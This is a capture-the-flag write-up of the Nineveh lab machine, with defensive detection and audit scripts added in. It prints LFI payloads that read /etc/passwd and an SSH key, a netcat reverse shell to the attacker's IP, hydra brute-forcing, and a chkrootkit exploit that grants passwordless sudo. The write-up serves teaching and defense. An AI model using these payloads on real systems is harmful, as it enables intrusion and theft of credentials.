ENUMERATION

Nmap Scan

Adding nineveh.htb to the hosts file

80 HTTP ENUMERATION

Visiting the website shows

Gobuster and Nikto scans

Department

When we try to log in as amrois:amrois it says wrong username. When we try admin:admin it says wrong password, so the different error messages confirm that admin is a valid username. Tried SQL injection, but it didn’t work. Running a gobuster scan again on /department

After enumerating a lot I found there is no option left apart from brute-forcing the password. Capture the request in Burp

Now use hydra with the rockyou.txt wordlist

We got the password

Checking the notes we see

LFI (used again later, after the 443 enumeration)

php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd : works

php://filter/convert.base64-encode/resource=../../../../../../../../home/amrois/.ssh/id_rsa : gives us "File name too long"
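The two requests above are exactly what the web server's access log records, so they are also what a defender can alert on. The script below is an added example (not part of the original write-up): it parses constructed Apache-style log lines, URL-decodes the request (hydra and browsers often send the wrapper percent-encoded), and flags stream wrappers, directory traversal and well-known sensitive paths. The endpoint /department/view.php?page= and the log lines are made up for the demo; the ninevehNotes name follows the hint in the write-up. The allow-list check at the end is the fix the vulnerable page should have applied: accept a bare note file name and nothing else.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log lines for the demo; the endpoint /department/view.php?page=
# is a stand-in, not the real parameter from the box.
SAMPLE_LOG = """\
10.10.14.16 - - [01/Jan/2024:10:00:01 +0000] "GET /department/view.php?page=files/ninevehNotes.txt HTTP/1.1" 200 512
10.10.14.16 - - [01/Jan/2024:10:00:05 +0000] "GET /department/view.php?page=php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd HTTP/1.1" 200 2048
10.10.14.16 - - [01/Jan/2024:10:00:09 +0000] "GET /department/view.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fhome%2Famrois%2F.ssh%2Fid_rsa HTTP/1.1" 500 128
10.10.14.20 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 4096
"""

# Common Log Format, with the request line split into method and URL.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)
# Stream wrappers that include() honours; php://filter is the one used in the write-up.
WRAPPER_RE = re.compile(r'\b(php|data|expect|phar|zip|glob)://', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')
SENSITIVE_RE = re.compile(r'(/etc/passwd|/etc/shadow|\.ssh/id_rsa|/proc/self|\.htpasswd)')
# The allow-list the vulnerable page should have enforced: a bare note name, no path, no scheme.
ALLOWED_NOTE_RE = re.compile(r'^[A-Za-z0-9_-]+\.txt$')


def fully_decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are inspected in plain form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_url(url):
    """Return the list of LFI indicators found in a request URL (decoded first)."""
    decoded = fully_decode(url)
    reasons = []
    if WRAPPER_RE.search(decoded):
        reasons.append('stream_wrapper')
    if TRAVERSAL_RE.search(decoded):
        reasons.append('traversal')
    if SENSITIVE_RE.search(decoded):
        reasons.append('sensitive_path')
    return reasons


def detect_lfi(log_text):
    """Scan access-log text; return one finding per request that looks like an LFI attempt."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_url(m['url'])
        if reasons:
            findings.append({
                'ip': m['ip'],
                'status': int(m['status']),
                'url': fully_decode(m['url']),
                'reasons': reasons,
            })
    return findings


def is_allowed_note(value):
    """Mitigation side: accept only a plain note file name, never a path or a wrapper."""
    return bool(ALLOWED_NOTE_RE.match(fully_decode(value)))


if __name__ == '__main__':
    for f in detect_lfi(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {','.join(f['reasons'])} {f['url']}")
```

Note that the third sample request returned a 500: the "File name too long" error from the write-up does not make the request any less interesting, so the detector keys on the request, not on the response code. Feeding a real log through `detect_lfi(open('/var/log/apache2/access.log').read())` is the intended use.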

443 ENUMERATION

Nikto Scan

Gobuster Scan revealed

Visiting /db

After enumerating a lot on phpLiteAdmin, I couldn’t find a good exploit. So we brute-forced the login at /db/index.php

Capture the request in Burp

Using hydra, we get the password: password123. (Run hydra with rockyou.txt for the password and admin as the username; the username doesn’t make a difference, since phpLiteAdmin defines no user, only a password.)
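Both logins on this box (the department form and phpLiteAdmin) fell to hydra because nothing throttled or locked out repeated attempts. The following is an added example, not code from the write-up: a sliding-window detector that counts POSTs per source address to each login endpoint over constructed log lines and flags any client that exceeds a threshold inside the window. The path /department/login.php is an assumed name for the department form; /db/index.php is the phpLiteAdmin login from the write-up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)
# Login endpoints worth watching; /department/login.php is an assumed name for the department form.
LOGIN_PATHS = {'/department/login.php', '/db/index.php'}
TS_FMT = '%d/%b/%Y:%H:%M:%S %z'


def make_sample_log():
    """Constructed log: one client posting to /db/index.php once a second, another logging in normally."""
    base = datetime(2024, 1, 1, 10, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(30):
        t = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f'10.10.14.16 - - [{t}] "POST /db/index.php HTTP/1.1" 200 1024')
    for i in range(3):
        t = (base + timedelta(minutes=i)).strftime(TS_FMT)
        lines.append(f'10.10.14.20 - - [{t}] "POST /department/login.php HTTP/1.1" 200 512')
    return '\n'.join(lines)


def detect_bruteforce(log_text, threshold=20, window_seconds=60):
    """Count POSTs per (ip, login path) in a sliding window.

    Returns {(ip, path): peak attempts seen inside one window} for every offender.
    The response code is ignored on purpose: phpLiteAdmin answers 200 to a bad password.
    """
    recent = defaultdict(deque)   # (ip, path) -> timestamps still inside the window
    alerts = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m['method'] != 'POST':
            continue
        path = m['url'].split('?', 1)[0]
        if path not in LOGIN_PATHS:
            continue
        ts = datetime.strptime(m['ts'], TS_FMT)
        key = (m['ip'], path)
        q = recent[key]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:   # drop knocks older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts


if __name__ == '__main__':
    for (ip, path), count in detect_bruteforce(make_sample_log()).items():
        print(f'{ip} -> {path}: {count} attempts within 60s')
```

Twenty POSTs to a login form inside a minute is well beyond what a human produces, so the default threshold is conservative. On the mitigation side the same counter can drive a temporary lockout or a fail2ban-style ban; for phpLiteAdmin the fix is simpler still, since it never needed to be reachable from the network and shipped with a single shared password.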

We see that we have access to the db, and there is a known exploit for RCE

Going as per the exploit

This did not work when executed through the LFI (the working version is shown with the real exploit in a minute). So, instead of creating a field whose default value contains the malicious code, we will create a field whose name contains the malicious code

Hack.php doesn’t work, because the LFI requires the name to contain ninevehNotes

And it worked

EXPLOITATION

For getting a shell we will send a URL-encoded reverse shell. I first used a URL-encoded nc -nv 10.10.14.16 1234 -e /bin/sh, but that didn’t work, so we will use a pipe instead.

GETTING USER

Running the strings command on both files we see that Nineveh.png contains SSH keys

So we check knockd.conf to see the SSH port-knocking rules

Simply running SSH against this doesn’t work, so we need to run an nmap scan against each of the ports mentioned above, in the same order
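To see why the order and the timing both matter, here is an added example (not from the write-up and not knockd's own code) that models the server side of port knocking: one ordered list of ports, a per-client timeout, and a reset whenever a client hits a port that is not the next one in the sequence. The sequence 571, 290, 911 and the client addresses are made up for the demo; the real sequence on the box is whatever knockd.conf says.

```python
class KnockDaemon:
    """Minimal model of knockd's sequence matching.

    A client must hit every port in `sequence`, in order, within `seq_timeout` seconds
    of its first knock. Any other port resets that client's progress.
    """

    def __init__(self, sequence, seq_timeout=5.0):
        self.sequence = tuple(sequence)
        self.seq_timeout = seq_timeout
        self._progress = {}    # client ip -> (index of next expected port, time of first knock)
        self.opened_for = []   # clients that completed the sequence (where the firewall rule would fire)

    def knock(self, ip, port, now):
        """Record one SYN from `ip` to `port` at time `now`; return True when the sequence completes."""
        index, started = self._progress.get(ip, (0, now))
        if index == 0 or now - started > self.seq_timeout:
            index, started = 0, now          # fresh attempt, or the previous one timed out
        if port == self.sequence[index]:
            index += 1                       # right port: advance
        elif port == self.sequence[0]:
            index, started = 1, now          # out of order, but valid as the start of a new attempt
        else:
            index = 0                        # anything else resets this client
        if index == len(self.sequence):
            self._progress.pop(ip, None)
            self.opened_for.append(ip)
            return True
        self._progress[ip] = (index, started)
        return False


if __name__ == '__main__':
    # Hypothetical sequence and clients, constructed for the demo.
    daemon = KnockDaemon(sequence=(571, 290, 911), seq_timeout=5)
    for port, t in [(571, 0.0), (290, 1.0), (911, 2.0)]:
        print(f'knock {port} at t={t}: opened={daemon.knock("10.10.14.16", port, t)}')
```

This is also why the write-up scans one port per nmap invocation: a single nmap run over several ports does not send its probes in the listed order unless told to, and a SYN to the wrong port resets the daemon's state for that client. From the defensive side the model shows the knobs that matter: a short seq_timeout and a longer sequence make accidental or scanned-in matches far less likely, and a client that repeatedly resets the sequence is itself a signal worth logging.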

PRIVILEGE ESCALATION

We see that every minute a report is generated in the report folder by report-reset.sh. Since this is done by chkrootkit, which is vulnerable to a known exploit: when it finds no valid file name it takes its input from /tmp/update.

https://www.exploit-db.com/exploits/33899

So we will manipulate the update file in the tmp directory (we will create a file /tmp/update) and have it change the permissions of /etc/sudoers, write amrois into sudoers with an entry that requires no password for running sudo, and then restore the permissions of /etc/sudoers
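The same two facts that make this privilege escalation work are easy to audit for: a file named update in /tmp that a vulnerable chkrootkit would run as root, and a NOPASSWD sudoers entry for an ordinary user. The script below is an added example, not part of the write-up: `audit_update_file` reports on the presence, ownership and mode of <dir>/update, and `audit_sudoers` parses sudoers text and returns every NOPASSWD: ALL grant to someone other than root. The sudoers sample is constructed, and the demo runs the file check against a throwaway directory instead of the real /tmp.

```python
import os
import re
import stat
import tempfile

# Matches "user  HOST=(runas) NOPASSWD: ALL" style entries; user-spec lines only.
SUDO_ENTRY_RE = re.compile(r'^\s*(?P<who>[^\s#]+)\s+\S+\s*=.*\bNOPASSWD:\s*ALL\b')

# Constructed sample, not the box's real file.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
amrois  ALL=(ALL) NOPASSWD: ALL
"""


def audit_update_file(tmp_dir='/tmp'):
    """Report on <tmp_dir>/update, the path the vulnerable chkrootkit executes as root."""
    path = os.path.join(tmp_dir, 'update')
    findings = []
    if not os.path.lexists(path):
        return findings                       # nothing there: the hijack path is closed
    st = os.lstat(path)
    findings.append(f'{path} exists; remove it and upgrade chkrootkit')
    if stat.S_ISLNK(st.st_mode):
        findings.append(f'{path} is a symlink')
    if st.st_uid != 0:
        findings.append(f'{path} is owned by uid {st.st_uid}, not root')
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f'{path} is group- or world-writable')
    if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append(f'{path} is executable')
    return findings


def audit_sudoers(text):
    """Return (user, line) for every NOPASSWD: ALL entry granted to someone other than root."""
    hits = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].rstrip()  # strip trailing comments
        m = SUDO_ENTRY_RE.match(line)
        if m and m['who'] != 'root':
            hits.append((m['who'], line.strip()))
    return hits


def demo():
    """Run both checks: an empty temp dir, the same dir with a world-writable update file, and the sample sudoers."""
    with tempfile.TemporaryDirectory() as d:
        before = audit_update_file(d)
        target = os.path.join(d, 'update')
        with open(target, 'w') as fh:
            fh.write('placeholder\n')          # harmless content; only the metadata is audited
        os.chmod(target, 0o777)
        after = audit_update_file(d)
    return before, after, audit_sudoers(SAMPLE_SUDOERS)


if __name__ == '__main__':
    before, after, sudo_hits = demo()
    print('clean dir:', before)
    print('with update file:', *after, sep='\n  ')
    print('sudoers:', sudo_hits)
```

On a real host the checks are `audit_update_file('/tmp')` and `audit_sudoers(open('/etc/sudoers').read())` (the latter needs root, and files under /etc/sudoers.d deserve the same pass). A sudoers entry for a web-server or service account with NOPASSWD: ALL is exactly the trace this escalation leaves behind, so the parser is worth running from the same cron that runs chkrootkit.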

ROOTED !!!

OSCP | CEH | Cyber Security Enthusiast.